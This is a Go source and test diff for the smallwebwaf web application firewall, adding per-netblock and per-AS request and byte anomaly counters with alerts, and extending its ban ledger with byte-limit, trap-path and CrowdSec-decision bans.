if client.Is4() {
length = c.params.NetV4Prefix
}
return netip.PrefixFrom(client, length).Masked()
}
// overThreshold is a count over its threshold: what it counts, requests or
// bytes, its window, the count and the threshold.
type overThreshold struct {
kind, window string
count float64
threshold int64
}
// add counts a request of bytes at now in each of c's counts whose
// threshold, in thresholds, is set, and returns the first count over its
// threshold, and whether there is one.
func (c *Counter) add(
now time.Time, bytes int64, thresholds Thresholds,
) (overThreshold, bool) {
// In the order of counts.
inOrder := [4]int64{
thresholds.RequestsPerMinute, thresholds.BytesPerMinute,
thresholds.RequestsPerHour, thresholds.BytesPerHour,
}
var (
first overThreshold
passed bool
)
for i, count := range c.counts() {
threshold := inOrder[i]
if threshold == 0 {
continue
}
n := int64(1)
if count.kind == ratelimit.KindBytes {
n = bytes
}
counted := count.buckets.Add(now, count.length, n)
if !passed && counted > float64(threshold) {
first = overThreshold{count.kind, count.window, counted, threshold}
passed = true
}
}
return first, passed
}
// bucketCount is one of a counter's four counts: requests or bytes, in a
// window of length, and the buckets they are counted in.
type bucketCount struct {
kind, window string
length time.Duration
buckets *ratelimit.Buckets
}
// counts returns c's counts: requests and bytes in the minute, then in
// the hour.
func (c *Counter) counts() [4]bucketCount {
return [4]bucketCount{
{ratelimit.KindRequests, minute, time.Minute, &c.Minute},
{ratelimit.KindBytes, minute, time.Minute, &c.MinuteBytes},
{ratelimit.KindRequests, hour, time.Hour, &c.Hour},
{ratelimit.KindBytes, hour, time.Hour, &c.HourBytes},
}
}
// lastStart returns the start of c's latest bucket, which tells, to the
// minute or to the hour, when c was last counted.
func (c *Counter) lastStart() time.Time {
var latest time.Time
for _, count := range c.counts() {
if count.buckets.Start.After(latest) {
latest = count.buckets.Start
}
}
return latest
}
// key returns what tells c from the other counters.
func (c *Counter) key() key {
return key{scope: c.Scope, netblock: c.Netblock, asn: c.ASN, name: c.Name}
}
// counter returns a counter for k, with nothing counted yet.
func (k key) counter() *Counter {
return &Counter{Scope: k.scope, Netblock: k.netblock, ASN: k.asn, Name: k.name}
}
// alertFor returns the anomaly alert for o, a count over its threshold in
// the scope k, which r took over it. It gives r's client, with its AS
// number, AS name and country, and the netblock counted, of a client, the
// netblock around it or a named netblock. Its detail gives the scope, the
// AS number or the name of a scope that has one, the window, what is
// counted, the count and the threshold.
func alertFor(r Request, k key, o overThreshold) alerts.Alert {
detail := map[string]any{
"scope": k.scope, "window": o.window, "kind": o.kind, "count": o.count,
"threshold": o.threshold,
}
var counted string
switch k.scope {
case ScopeClient:
counted = "the client " + k.netblock.String()
case ScopeNet:
counted = "the netblock " + k.netblock.String()
case ScopeASN:
counted = k.asn
detail["asn"] = k.asn
case ScopeTotal:
counted = "the whole service"
default: // watch
counted = "the named netblock " + k.name + ", " + k.netblock.String()
detail["name"] = k.name
}
return alerts.Alert{
Event: alerts.EventAnomaly,
Client: r.Client,
Netblock: k.netblock,
ASN: r.ASN,
ASName: r.ASName,
Country: r.Country,
Reason: fmt.Sprintf("%s per %s of %s over the threshold of %d", o.kind, o.window,
counted, o.threshold),
Detail: detail,
}
}
+238
View File
@@ -0,0 +1,238 @@
package anomaly_test
import (
"encoding/json"
"fmt"
"net/netip"
"net/url"
"reflect"
"slices"
"testing"
"time"
"sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/anomaly"
"sneak.berlin/go/smallwebwaf/internal/ratelimit"
)
// maxCounters is how many counters are kept.
const maxCounters = 20000
func TestEachScopeHasACooldownOfItsOwn(t *testing.T) {
t.Parallel()
queue := newQueue()
office := netip.MustParsePrefix("203.0.113.0/24")
overAtTheSecond := anomaly.Thresholds{RequestsPerMinute: 1}
counters := anomaly.New(anomaly.Params{
Client: overAtTheSecond, Net: overAtTheSecond, ASN: overAtTheSecond,
Total: overAtTheSecond, Watch: overAtTheSecond,
// The netblock around a client is the client's own, and two names
// name one netblock.
NetV4Prefix: 32,
NamedNetblocks: []anomaly.NamedNetblock{
{Name: "office", Netblock: office}, {Name: "hq", Netblock: office},
},
Alerts: queue,
})
// The first client's second request is over the threshold in the six
// scopes it is in. The other client's two are both over it in the whole
// service and in each named netblock, three repeats each, and its
// second is over it in the scopes of its own, its client, its netblock
// and its AS number, which are no repeats.
for _, r := range []anomaly.Request{
{Client: netip.MustParseAddr("203.0.113.9"), ASN: "AS64496"},
{Client: netip.MustParseAddr("203.0.113.10"), ASN: "AS64511"},
} {
r.ClientGroup = netip.PrefixFrom(r.Client, 32)
for range 2 {
counters.Count(midnight(), r)
}
}
waiting := queue.Snapshot().Waiting[alerts.DestinationWebhook]
if len(waiting) != 9 || queue.Suppressed() != 6 {
t.Fatalf("%d alerts wait and %d are held back, want 9 and 6: %+v",
len(waiting), queue.Suppressed(), waiting)
}
// alerts.json keeps each scope's cooldown: each alert raised again
// after a restart is a repeat.
data, err := json.Marshal(queue.Snapshot())
if err != nil {
t.Fatalf("encode: %v", err)
}
var read alerts.State
err = json.Unmarshal(data, &read)
if err != nil {
t.Fatalf("decode: %v", err)
}
after := newQueue()
after.Load(read)
for _, alert := range read.Waiting[alerts.DestinationWebhook] {
after.Raise(alert)
}
if after.Suppressed() != 9 {
t.Errorf("after loading, %d alerts are held back, want 9", after.Suppressed())
}
}
func TestKeepsAtMost20000CountersDroppingTheLeastRecentlyCounted(t *testing.T) {
t.Parallel()
counters := newCounters(anomaly.Params{
Client: anomaly.Thresholds{RequestsPerMinute: 1000},
})
for i := range maxCounters {
counters.Count(midnight(), request(i))
}
// Counted again, the first client is the most recently counted, and
// the second is dropped for a new one.
counters.Count(midnight(), request(0))
counters.Count(midnight(), request(maxCounters))
got := counters.Snapshot()
if len(got) != maxCounters || !holds(got, 0) || holds(got, 1) ||
!holds(got, maxCounters) {
t.Errorf("%d counters, holding the first client %v, the second %v and the "+
"new one %v, want %d, the first and the new one", len(got), holds(got, 0),
holds(got, 1), holds(got, maxCounters), maxCounters)
}
}
func TestLoadEmptiesBucketsWhoseTimeHasPassedAndDropsEmptyCounters(t *testing.T) {
t.Parallel()
counters := newCounters(anomaly.Params{
Net: anomaly.Thresholds{RequestsPerMinute: 1000, RequestsPerHour: 1000},
Total: anomaly.Thresholds{RequestsPerMinute: 1000},
NetV4Prefix: 24,
})
halfAnHourOn := midnight().Add(30 * time.Minute)
// Half an hour on, the hour's buckets count still, and the minute's
// do not.
counters.Load([]anomaly.Counter{
{
Scope: anomaly.ScopeNet,
Netblock: netip.MustParsePrefix("203.0.113.9/24"),
Minute: ratelimit.Buckets{Start: midnight(), Current: 5},
Hour: ratelimit.Buckets{Start: midnight(), Current: 7},
},
{
Scope: anomaly.ScopeTotal,
Minute: ratelimit.Buckets{Start: midnight(), Current: 1},
},
}, halfAnHourOn)
// The whole service's counter, left empty, is dropped, and the
// netblock read is masked to its length.
netblock := anomaly.Counter{
Scope: anomaly.ScopeNet,
Netblock: netip.MustParsePrefix("203.0.113.0/24"),
Hour: ratelimit.Buckets{Start: midnight(), Current: 7},
}
if got, want := counters.Snapshot(), []anomaly.Counter{netblock}; !reflect.DeepEqual(
got, want) {
t.Errorf("counters read\n%+v\nwant\n%+v", got, want)
}
// A request from the netblock is counted with the requests read.
counters.Count(halfAnHourOn, anomaly.Request{
Client: netip.MustParseAddr("203.0.113.9"),
ClientGroup: netip.MustParsePrefix("203.0.113.9/32"),
})
netblock.Minute = ratelimit.Buckets{Start: halfAnHourOn, Current: 1}
netblock.Hour.Current = 8
want := []anomaly.Counter{netblock, {
Scope: anomaly.ScopeTotal,
Minute: ratelimit.Buckets{Start: halfAnHourOn, Current: 1},
}}
if got := counters.Snapshot(); !reflect.DeepEqual(got, want) {
t.Errorf("counters after a request\n%+v\nwant\n%+v", got, want)
}
}
func TestLoadDropsTheLeastRecentlyCountedFirst(t *testing.T) {
t.Parallel()
counters := newCounters(anomaly.Params{
Client: anomaly.Thresholds{RequestsPerMinute: 1000},
})
now := midnight().Add(time.Minute)
// The second half of the file was counted in the minute before the
// first half.
read := make([]anomaly.Counter, 0, maxCounters)
for i := range maxCounters {
start := now
if i >= maxCounters/2 {
start = midnight()
}
read = append(read, anomaly.Counter{
Scope: anomaly.ScopeClient, Netblock: request(i).ClientGroup,
Minute: ratelimit.Buckets{Start: start, Current: 1},
})
}
counters.Load(read, now)
counters.Count(now, request(maxCounters))
got := counters.Snapshot()
if !holds(got, 0) || holds(got, maxCounters/2) {
t.Errorf("holding the first client of the file %v, and the first counted in "+
"the minute before %v, want only the first", holds(got, 0),
holds(got, maxCounters/2))
}
}
// midnight is the time of the tests' requests.
func midnight() time.Time {
return time.Date(2026, 10, 6, 0, 0, 0, 0, time.UTC)
}
// newCounters returns Counters for params, whose alerts go nowhere.
func newCounters(params anomaly.Params) *anomaly.Counters {
params.Alerts = alerts.New(alerts.Params{})
return anomaly.New(params)
}
// newQueue returns a queue of alerts to a webhook, with the default
// cooldown, which keeps them waiting, since it is never run.
func newQueue() *alerts.Queue {
return alerts.New(alerts.Params{
WebhookURL: &url.URL{Scheme: "https", Host: "alerts.example"},
Events: alerts.Events(),
Cooldown: 15 * time.Minute,
MaxPerHour: 60,
Now: midnight,
})
}
// request returns a request from client number i, an address in
// 10.0.0.0/8.
func request(i int) anomaly.Request {
client := netip.MustParseAddr(fmt.Sprintf("10.%d.%d.%d", i>>16, i>>8&255, i&255))
return anomaly.Request{Client: client, ClientGroup: netip.PrefixFrom(client, 32)}
}
// holds reports whether counters hold the counter of client number i.
func holds(counters []anomaly.Counter, i int) bool {
return slices.ContainsFunc(counters, func(counter anomaly.Counter) bool {
return counter.Netblock == request(i).ClientGroup
})
}
+8 -4
View File
@@ -2,6 +2,7 @@ package bans_test
import ( import (
"net/netip" "net/netip"
"reflect"
"testing" "testing"
"time" "time"
@@ -66,12 +67,15 @@ func TestReasonOfTheBansSmallwebwafMakes(t *testing.T) {
ledger := bans.New(defaultRules()) ledger := bans.New(defaultRules())
limit, _ := ledger.BanForLimit(netip.MustParsePrefix("203.0.113.1/32"), midnight(), limit, _ := ledger.BanForLimit(netip.MustParsePrefix("203.0.113.1/32"), midnight(),
bans.Notes{Limit: 1000, Window: "minute"}) bans.Notes{Kind: "requests", Limit: 1000, Window: "minute"})
byteLimit, _ := ledger.BanForLimit(netip.MustParsePrefix("203.0.113.3/32"),
midnight(), bans.Notes{Kind: "bytes", Limit: 10 << 30, Window: "hour"})
attack, _ := ledger.BanForAttack(netip.MustParsePrefix("203.0.113.2/32"), midnight(), attack, _ := ledger.BanForAttack(netip.MustParsePrefix("203.0.113.2/32"), midnight(),
bans.Notes{RuleID: "git-dir", Target: "path"}) bans.Notes{RuleID: "git-dir", Target: "path"})
for _, tc := range []struct{ got, want string }{ for _, tc := range []struct{ got, want string }{
{limit.Reason, "requests per minute over the limit of 1000"}, {limit.Reason, "requests per minute over the limit of 1000"},
{byteLimit.Reason, "bytes per hour over the limit of 10737418240"},
{attack.Reason, "matched the rule git-dir"}, {attack.Reason, "matched the rule git-dir"},
} { } {
if tc.got != tc.want { if tc.got != tc.want {
@@ -114,7 +118,7 @@ func TestLiftedBanForALimitRefusesNothingAndMakesNoBanLonger(t *testing.T) {
} }
held := ledger.Bans(netblock) held := ledger.Bans(netblock)
if len(held) != 2 || held[0] != lifted { if len(held) != 2 || !reflect.DeepEqual(held[0], lifted) {
t.Errorf("the ledger holds %+v, want the lifted ban and the new one", held) t.Errorf("the ledger holds %+v, want the lifted ban and the new one", held)
} }
} }
@@ -209,7 +213,7 @@ func TestAdminsBanIsMadeWhileAnotherLasts(t *testing.T) {
got := ledger.BanForAdmin(netip.MustParsePrefix("203.0.113.9/24"), now, time.Time{}, got := ledger.BanForAdmin(netip.MustParsePrefix("203.0.113.9/24"), now, time.Time{},
"probes for logins") "probes for logins")
if got != want { if !reflect.DeepEqual(got, want) {
t.Errorf("the admin's ban is\n%+v\nwant\n%+v", got, want) t.Errorf("the admin's ban is\n%+v\nwant\n%+v", got, want)
} }
@@ -221,7 +225,7 @@ func TestAdminsBanIsMadeWhileAnotherLasts(t *testing.T) {
// It refuses once the ban for the limit has ended. // It refuses once the ban for the limit has ended.
ban, banned, _ := ledger.Find(netblock.Addr(), midnight().Add(2*time.Hour)) ban, banned, _ := ledger.Find(netblock.Addr(), midnight().Add(2*time.Hour))
if !banned || ban != want { if !banned || !reflect.DeepEqual(ban, want) {
t.Errorf("after the limit's ban the netblock is under %+v (%t), want %+v", t.Errorf("after the limit's ban the netblock is under %+v (%t), want %+v",
ban, banned, want) ban, banned, want)
} }
+123 -42
View File
@@ -1,8 +1,10 @@
// Package bans is the ban ledger: the bans smallwebwaf makes on the // Package bans is the ban ledger: the bans smallwebwaf makes on the
// netblocks of clients that break a rate limit or show a clear sign of // netblocks of clients that break a rate limit, a byte limit or the error
// attack, and those an admin makes, with their notes, as the "Bans" // burst, show a clear sign of attack or are listed by the CrowdSec
// section of SPEC.md describes. The bans are kept in memory, and written // decision list, and
// to bans.json and read from it by the state package. // those an admin makes, with their notes, as the "Bans" section of SPEC.md
// describes. The bans are kept in memory, and written to bans.json and
// read from it by the state package.
package bans package bans
import ( import (
@@ -26,6 +28,9 @@ const (
// CauseAdmin is a ban an admin made, or one smallwebwaf made that an // CauseAdmin is a ban an admin made, or one smallwebwaf made that an
// admin keeps. It is never dropped. // admin keeps. It is never dropped.
CauseAdmin = "admin" CauseAdmin = "admin"
// CauseCrowdSec is a ban smallwebwaf made for a client the CrowdSec
// decision list lists. It ends when CrowdSec's decision does.
CauseCrowdSec = "crowdsec"
) )
// repeatFactor is how many times as long as the netblock's last ban a ban // repeatFactor is how many times as long as the netblock's last ban a ban
@@ -40,9 +45,9 @@ type Rules struct {
// LimitBanDuration is how long a first ban for a broken limit lasts. // LimitBanDuration is how long a first ban for a broken limit lasts.
LimitBanDuration time.Duration LimitBanDuration time.Duration
// LimitBanRepeatWindow is how soon after the end of the netblock's // LimitBanRepeatWindow is how soon after the end of the netblock's
// ban that ended last, other than one for a clear sign of attack, a // ban that ended last, other than one for a clear sign of attack or for
// broken limit counts as a repeat, which bans for repeatFactor times as // CrowdSec's decision, a broken limit counts as a repeat, which bans for
// long as that ban. // repeatFactor times as long as that ban.
LimitBanRepeatWindow time.Duration LimitBanRepeatWindow time.Duration
// MaxBanDuration is the longest ban for a broken limit; one that would // MaxBanDuration is the longest ban for a broken limit; one that would
// be longer is permanent instead. // be longer is permanent instead.
@@ -63,10 +68,11 @@ type Ban struct {
Start time.Time Start time.Time
// Expires is when the ban ends, zero for a permanent ban. // Expires is when the ban ends, zero for a permanent ban.
Expires time.Time Expires time.Time
// Cause is CauseLimit, CauseAttack or CauseAdmin. // Cause is CauseLimit, CauseAttack, CauseAdmin or CauseCrowdSec.
Cause string Cause string
// Reason is a short text: for a ban smallwebwaf made, the limit broken // Reason is a short text: for a ban smallwebwaf made, the limit broken,
// or the rule that matched; for an admin's, what the admin wrote. // the rule that matched or the scenario of CrowdSec's decision; for an
// admin's, what the admin wrote.
Reason string Reason string
// Lifted is when an admin lifted the ban, zero while no admin has. A // Lifted is when an admin lifted the ban, zero while no admin has. A
// lifted ban refuses nothing, and does not make the netblock's next // lifted ban refuses nothing, and does not make the netblock's next
@@ -97,20 +103,37 @@ type Notes struct {
ASN string `json:"asn"` ASN string `json:"asn"`
ASName string `json:"as_name"` ASName string `json:"as_name"`
Country string `json:"country"` Country string `json:"country"`
// Limit, Window and Count are, for a ban for a broken limit, the limit // Kind, Limit, Window and Count are, for a ban for a broken limit,
// that was broken, its window, "minute", "hour" or "day", and the // what the limit was on, "requests" for a rate limit, "bytes" for a
// count reached: the client's requests in the window, the one that // byte limit or "refusals" for the error burst, the limit that was
// broke the limit included. These are the requests that counted // broken, its window, "minute", "hour" or "day", and the count reached:
// toward the ban, and the window is the time over which they came. // the client's requests, bytes or refusals in the window, those of the
// request that broke the limit included.
// These are what counted toward the ban, and the window is the time
// over which they came.
Kind string `json:"kind,omitempty"`
Limit int64 `json:"limit,omitempty"` Limit int64 `json:"limit,omitempty"`
Window string `json:"window,omitempty"` Window string `json:"window,omitempty"`
Count float64 `json:"count,omitempty"` Count float64 `json:"count,omitempty"`
// LimitPercent and LimitPercentSetting are, for a ban for a limit a
// biased threshold lowered, the client's percentage of that kind of
// limit, of which Limit is the result, and the setting that gave it.
// Both are left out for a limit that was not lowered.
LimitPercent *int64 `json:"limit_percent,omitempty"`
LimitPercentSetting string `json:"limit_percent_setting,omitempty"`
// RuleID and Target are, for a ban for a clear sign of attack, the id // RuleID and Target are, for a ban for a clear sign of attack, the id
// of the rule file rule that matched, and its target. // of the rule file rule that matched, and its target; TrapPath is, for
// one for a request for a path in SWWAF_TRAP_PATHS, that path.
RuleID string `json:"rule_id,omitempty"` RuleID string `json:"rule_id,omitempty"`
Target string `json:"target,omitempty"` Target string `json:"target,omitempty"`
// Request is the request that broke the limit, or that was the clear TrapPath string `json:"trap_path,omitempty"`
// sign of attack. // Reputation is the reputation sources that listed the client when
// the request that caused the ban was made, in the order the request
// log's reputation names them. It is left out when none did.
Reputation []ReputationHit `json:"reputation,omitempty"`
// Request is the request that broke the limit, or whose bytes broke
// it, that was the clear sign of attack, or that came from a client the
// CrowdSec decision list lists.
Request Request `json:"request"` Request Request `json:"request"`
// Requests is how many requests the netblock has sent since it was // Requests is how many requests the netblock has sent since it was
// first seen, and Refused how many of them the ban has refused so // first seen, and Refused how many of them the ban has refused so
@@ -122,11 +145,22 @@ type Notes struct {
EarlierBans EarlierBans `json:"earlier_bans"` EarlierBans EarlierBans `json:"earlier_bans"`
} }
// ReputationHit is a reputation source that listed a client, as a
// reputation_hit alert's detail gives it: Source is the URL of the
// blocklist or of the CrowdSec decision list, the DNSBL zone with its key
// masked, or "abuseipdb", and Score, for AbuseIPDB alone, its score of the
// client.
type ReputationHit struct {
Source string `json:"source"`
Score *int64 `json:"score,omitempty"`
}
// EarlierBans counts a netblock's bans before a ban, by cause. // EarlierBans counts a netblock's bans before a ban, by cause.
type EarlierBans struct { type EarlierBans struct {
Limit int `json:"limit"` Limit int `json:"limit"`
Attack int `json:"attack"` Attack int `json:"attack"`
Admin int `json:"admin"` Admin int `json:"admin"`
CrowdSec int `json:"crowdsec"`
} }
// Request is a request in a ban's notes. Each text is cut to 256 bytes. // Request is a request in a ban's notes. Each text is cut to 256 bytes.
@@ -254,17 +288,19 @@ func activeBan(bans []Ban, now time.Time) *Ban {
// BanForLimit bans netblock at now for a broken limit, with notes, and // BanForLimit bans netblock at now for a broken limit, with notes, and
// returns the ban, and true. A first ban lasts LimitBanDuration. A ban // returns the ban, and true. A first ban lasts LimitBanDuration. A ban
// made within LimitBanRepeatWindow after the netblock's ban that ended // made within LimitBanRepeatWindow after the netblock's ban that ended
// last, other than one for a clear sign of attack or a lifted one, lasts // last, other than one for a clear sign of attack or for CrowdSec's
// decision, or a lifted one, lasts
// repeatFactor times as long as that one. A ban that would be longer // repeatFactor times as long as that one. A ban that would be longer
// than MaxBanDuration is permanent instead. If a ban on netblock is still // than MaxBanDuration is permanent instead. If a ban on netblock is still
// active, as when two of its requests break a limit at once, that ban is // active, as when two of its requests break a limit at once, that ban is
// returned with false, and no other is made. The ledger fills in the // returned with false, and no other is made. The ledger fills in the
// notes' Refused and EarlierBans itself, and gives the ban the reason // notes' Refused and EarlierBans itself, and gives the ban the reason
// "requests per <Window> over the limit of <Limit>", from the notes. // "<Kind> per <Window> over the limit of <Limit>", from the notes, such
// as "requests per minute over the limit of 1000".
func (l *Ledger) BanForLimit( func (l *Ledger) BanForLimit(
netblock netip.Prefix, now time.Time, notes Notes, netblock netip.Prefix, now time.Time, notes Notes,
) (Ban, bool) { ) (Ban, bool) {
return l.ban(netblock, now, CauseLimit, limitReason(notes), notes, true) return l.ban(netblock, now, time.Time{}, CauseLimit, limitReason(notes), notes, true)
} }
// WouldBanForLimit returns what BanForLimit would, without making the ban: // WouldBanForLimit returns what BanForLimit would, without making the ban:
@@ -272,18 +308,18 @@ func (l *Ledger) BanForLimit(
func (l *Ledger) WouldBanForLimit( func (l *Ledger) WouldBanForLimit(
netblock netip.Prefix, now time.Time, notes Notes, netblock netip.Prefix, now time.Time, notes Notes,
) (Ban, bool) { ) (Ban, bool) {
return l.ban(netblock, now, CauseLimit, limitReason(notes), notes, false) return l.ban(netblock, now, time.Time{}, CauseLimit, limitReason(notes), notes, false)
} }
// BanForAttack bans netblock at now for a clear sign of attack, with // BanForAttack bans netblock at now for a clear sign of attack, with
// notes, and returns the ban, and whether it made it, as BanForLimit // notes, and returns the ban, and whether it made it, as BanForLimit
// does. A first ban lasts AttackBanDuration; once the netblock has had // does. A first ban lasts AttackBanDuration; once the netblock has had
// one that was not lifted, the next is permanent. Its reason is "matched // one that was not lifted, the next is permanent. Its reason is "matched
// the rule <RuleID>". // the rule <RuleID>", or "asked for the trap path <TrapPath>".
func (l *Ledger) BanForAttack( func (l *Ledger) BanForAttack(
netblock netip.Prefix, now time.Time, notes Notes, netblock netip.Prefix, now time.Time, notes Notes,
) (Ban, bool) { ) (Ban, bool) {
return l.ban(netblock, now, CauseAttack, attackReason(notes), notes, true) return l.ban(netblock, now, time.Time{}, CauseAttack, attackReason(notes), notes, true)
} }
// WouldBanForAttack returns what BanForAttack would, without making the // WouldBanForAttack returns what BanForAttack would, without making the
@@ -291,12 +327,35 @@ func (l *Ledger) BanForAttack(
func (l *Ledger) WouldBanForAttack( func (l *Ledger) WouldBanForAttack(
netblock netip.Prefix, now time.Time, notes Notes, netblock netip.Prefix, now time.Time, notes Notes,
) (Ban, bool) { ) (Ban, bool) {
return l.ban(netblock, now, CauseAttack, attackReason(notes), notes, false) return l.ban(netblock, now, time.Time{}, CauseAttack, attackReason(notes), notes,
false)
} }
// WouldBePermanent reports whether a ban on netblock for cause, CauseLimit // BanForCrowdSec bans netblock at now until expires, when CrowdSec's
// or CauseAttack, made at now would be permanent, as BanForLimit or // decision on the client ends, with notes, and returns the ban, and
// BanForAttack would make it. It works out nothing else of the ban. // whether it made it, as BanForLimit does. Its reason is "CrowdSec's
// decision for <scenario>", the scenario that made the decision.
func (l *Ledger) BanForCrowdSec(
netblock netip.Prefix, now, expires time.Time, scenario string, notes Notes,
) (Ban, bool) {
return l.ban(netblock, now, expires, CauseCrowdSec, crowdSecReason(scenario), notes,
true)
}
// WouldBanForCrowdSec returns what BanForCrowdSec would, without making
// the ban: what observe mode would have done.
func (l *Ledger) WouldBanForCrowdSec(
netblock netip.Prefix, now, expires time.Time, scenario string, notes Notes,
) (Ban, bool) {
return l.ban(netblock, now, expires, CauseCrowdSec, crowdSecReason(scenario), notes,
false)
}
// WouldBePermanent reports whether a ban on netblock for cause, CauseLimit,
// CauseAttack or CauseCrowdSec, made at now would be permanent, as
// BanForLimit, BanForAttack or BanForCrowdSec would make it. It works out
// nothing else of the ban. A ban for CrowdSec's decision is never
// permanent: it ends with the decision.
func (l *Ledger) WouldBePermanent( func (l *Ledger) WouldBePermanent(
netblock netip.Prefix, now time.Time, cause string, netblock netip.Prefix, now time.Time, cause string,
) bool { ) bool {
@@ -308,24 +367,38 @@ func (l *Ledger) WouldBePermanent(
held = *bans held = *bans
} }
if cause == CauseAttack { switch cause {
case CauseAttack:
return l.attackExpiry(held, now).IsZero() return l.attackExpiry(held, now).IsZero()
} case CauseLimit:
return l.limitExpiry(held, now).IsZero() return l.limitExpiry(held, now).IsZero()
default: // CauseCrowdSec
return false
}
} }
// limitReason is the reason of a ban for a broken limit, with notes. // limitReason is the reason of a ban for a broken limit, with notes.
func limitReason(notes Notes) string { func limitReason(notes Notes) string {
return fmt.Sprintf("requests per %s over the limit of %d", notes.Window, notes.Limit) return fmt.Sprintf("%s per %s over the limit of %d",
notes.Kind, notes.Window, notes.Limit)
} }
// attackReason is the reason of a ban for a clear sign of attack, with // attackReason is the reason of a ban for a clear sign of attack, with
// notes. // notes.
func attackReason(notes Notes) string { func attackReason(notes Notes) string {
if notes.TrapPath != "" {
return "asked for the trap path " + notes.TrapPath
}
return "matched the rule " + notes.RuleID return "matched the rule " + notes.RuleID
} }
// crowdSecReason is the reason of a ban for CrowdSec's decision, which
// scenario made.
func crowdSecReason(scenario string) string {
return "CrowdSec's decision for " + scenario
}
// BanForAdmin bans netblock at now for an admin, with reason, until // BanForAdmin bans netblock at now for an admin, with reason, until
// expires, or for good when expires is zero, and returns the ban, whose // expires, or for good when expires is zero, and returns the ban, whose
// cause is CauseAdmin. Unlike BanForLimit and BanForAttack, it makes the // cause is CauseAdmin. Unlike BanForLimit and BanForAttack, it makes the
@@ -563,11 +636,14 @@ func (l *Ledger) holds(netblock netip.Prefix, start time.Time) bool {
} }
// ban bans netblock at now for cause, with reason and notes, as // ban bans netblock at now for cause, with reason and notes, as
// BanForLimit and BanForAttack describe, and returns the ban, and whether // BanForLimit, BanForAttack and BanForCrowdSec describe, and returns the
// it made it. Unless keep is true, the ban is not made, only returned: it // ban, and whether it made it. expires is when a ban for CauseCrowdSec
// is the ban that would have been made. // ends, and zero for the others, whose end the ledger works out. Unless
// keep is true, the ban is not made, only returned: it is the ban that
// would have been made.
func (l *Ledger) ban( func (l *Ledger) ban(
netblock netip.Prefix, now time.Time, cause, reason string, notes Notes, keep bool, netblock netip.Prefix, now, expires time.Time, cause, reason string, notes Notes,
keep bool,
) (Ban, bool) { ) (Ban, bool) {
l.mu.Lock() l.mu.Lock()
defer l.mu.Unlock() defer l.mu.Unlock()
@@ -589,10 +665,13 @@ func (l *Ledger) ban(
notes.Request = notes.Request.cut() notes.Request = notes.Request.cut()
ban := Ban{Netblock: netblock, Start: now, Cause: cause, Reason: reason, Notes: notes} ban := Ban{Netblock: netblock, Start: now, Cause: cause, Reason: reason, Notes: notes}
if cause == CauseAttack { switch cause {
case CauseAttack:
ban.Expires = l.attackExpiry(held, now) ban.Expires = l.attackExpiry(held, now)
} else { case CauseLimit:
ban.Expires = l.limitExpiry(held, now) ban.Expires = l.limitExpiry(held, now)
default: // CauseCrowdSec
ban.Expires = expires
} }
if !keep { if !keep {
@@ -621,6 +700,8 @@ func earlierBans(held []Ban) EarlierBans {
earlier.Attack++ earlier.Attack++
case CauseAdmin: case CauseAdmin:
earlier.Admin++ earlier.Admin++
case CauseCrowdSec:
earlier.CrowdSec++
} }
} }
@@ -714,16 +795,16 @@ func (l *Ledger) add(ban Ban) {
// limitExpiry returns when a ban for a broken limit made at now ends, or // limitExpiry returns when a ban for a broken limit made at now ends, or
// zero when it is permanent. held are the netblock's bans, none of them // zero when it is permanent. held are the netblock's bans, none of them
// active, of which the one that ended last, other than a ban for a clear // active, of which the one that ended last, other than a ban for a clear
// sign of attack or a lifted one, can make the new ban longer. A ban an // sign of attack or for CrowdSec's decision, or a lifted one, can make the
// admin adds to bans.json can start after another and end before it, so // new ban longer. A ban an admin adds to bans.json can start after
// that one is looked for among them all. // another and end before it, so that one is looked for among them all.
func (l *Ledger) limitExpiry(held []Ban, now time.Time) time.Time { func (l *Ledger) limitExpiry(held []Ban, now time.Time) time.Time {
length := l.rules.LimitBanDuration length := l.rules.LimitBanDuration
var last *Ban var last *Ban
for i, ban := range held { for i, ban := range held {
if ban.Cause != CauseAttack && ban.Lifted.IsZero() && if (ban.Cause == CauseLimit || ban.Cause == CauseAdmin) && ban.Lifted.IsZero() &&
(last == nil || ban.Expires.After(last.Expires)) { (last == nil || ban.Expires.After(last.Expires)) {
last = &held[i] last = &held[i]
} }
+9 -8
View File
@@ -2,6 +2,7 @@ package bans_test
import ( import (
"net/netip" "net/netip"
"reflect"
"strings" "strings"
"testing" "testing"
"time" "time"
@@ -130,13 +131,13 @@ func TestBrokenLimitDuringABanMakesNoOther(t *testing.T) {
again, made := ledger.BanForLimit(netblock, midnight().Add(time.Minute), bans.Notes{}) again, made := ledger.BanForLimit(netblock, midnight().Add(time.Minute), bans.Notes{})
if made || again != first || len(ledger.Bans(netblock)) != 1 { if made || !reflect.DeepEqual(again, first) || len(ledger.Bans(netblock)) != 1 {
t.Errorf("a limit broken during a ban gave %+v, made %t, and %d bans, "+ t.Errorf("a limit broken during a ban gave %+v, made %t, and %d bans, "+
"want %+v, not made, and 1", again, made, len(ledger.Bans(netblock)), first) "want %+v, not made, and 1", again, made, len(ledger.Bans(netblock)), first)
} }
again, made = ledger.BanForAttack(netblock, midnight().Add(time.Minute), bans.Notes{}) again, made = ledger.BanForAttack(netblock, midnight().Add(time.Minute), bans.Notes{})
if made || again != first { if made || !reflect.DeepEqual(again, first) {
t.Errorf("an attack during a ban gave %+v, made %t, want %+v, not made", t.Errorf("an attack during a ban gave %+v, made %t, want %+v, not made",
again, made, first) again, made, first)
} }
@@ -182,7 +183,7 @@ func TestFindCountsNothing(t *testing.T) {
ban, _ := ledger.BanForLimit(netblock, midnight(), bans.Notes{Requests: 5}) ban, _ := ledger.BanForLimit(netblock, midnight(), bans.Notes{Requests: 5})
got, banned, _ := ledger.Find(netblock.Addr(), ban.Expires.Add(-time.Nanosecond)) got, banned, _ := ledger.Find(netblock.Addr(), ban.Expires.Add(-time.Nanosecond))
if !banned || got != ban { if !banned || !reflect.DeepEqual(got, ban) {
t.Errorf("find during the ban gives %+v and %t, want %+v", got, banned, ban) t.Errorf("find during the ban gives %+v and %t, want %+v", got, banned, ban)
} }
@@ -191,7 +192,7 @@ func TestFindCountsNothing(t *testing.T) {
t.Error("the ban did not end") t.Error("the ban did not end")
} }
if notes := ledger.Bans(netblock)[0].Notes; notes != ban.Notes { if notes := ledger.Bans(netblock)[0].Notes; !reflect.DeepEqual(notes, ban.Notes) {
t.Errorf("the notes are %+v, want them unchanged, %+v", notes, ban.Notes) t.Errorf("the notes are %+v, want them unchanged, %+v", notes, ban.Notes)
} }
} }
